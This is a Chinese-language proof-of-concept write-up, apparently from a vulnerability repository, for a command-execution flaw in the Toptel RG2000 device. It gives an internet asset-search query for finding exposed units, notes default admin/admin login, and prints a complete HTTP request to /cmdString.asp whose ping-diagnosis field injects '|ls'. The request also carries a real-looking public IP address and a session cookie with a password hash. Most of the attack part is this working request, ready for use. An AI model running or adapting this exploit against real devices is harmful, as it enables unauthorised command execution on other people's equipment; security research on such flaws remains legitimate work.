POC/wpoc/深圳市拓普泰尔科技有限公司/深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

44 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞
# 一、漏洞简介
拓普泰尔是深圳市拓普泰尔科技有限公司2018年10月28日在中国商标局注册成立的品牌提供集成电路; 计算机硬件; 电传真设备; 芯片(集成电路); 印刷电路板; 数据处理设备; 视频显示屏; 纤维光缆; 连接器(数据处理设备); 集成电路卡等服务。深圳市拓普泰尔科技有限公司RG2000存在命令执行漏洞
# 二、影响版本
+ RG2000
# 三、资产测绘
```http
app="TOPTEL-RG2000"
```
![1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a.png](./img/7JxBmoSuzuvUDeWr/1722618708171-4d2e03b4-ee0b-4705-ad74-56a5b593643a-728808.png)
# 四、漏洞复现
```plain
POST /cmdString.asp HTTP/1.1
Host:
Content-Length: 90
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://58.18.212.238:11180
Referer: http://58.18.212.238:11180/index.html?rand=Nov-14-2022-18:11:039
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=0; user=admin; nonce=ffffffff015446cc0026259d; password=3d49ce727b199b6cdca0cf40c217b8d1
Connection: close
cmdString=rg_ping_diagnosis%0B%0D%09%0Acmd_diagnosis_dst_address%3D127.0.0.1%7Cls%0D%09%0A
```
admin/admin登录
通信检测处ping命令和traceroute存在命令执行漏洞
![1722620405428-275246cb-7a70-4bef-b880-d27a2161f073.png](./img/7JxBmoSuzuvUDeWr/1722620405428-275246cb-7a70-4bef-b880-d27a2161f073-669894.png)
> 更新: 2024-08-12 17:48:53
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hu8fngdtmgaf17yv>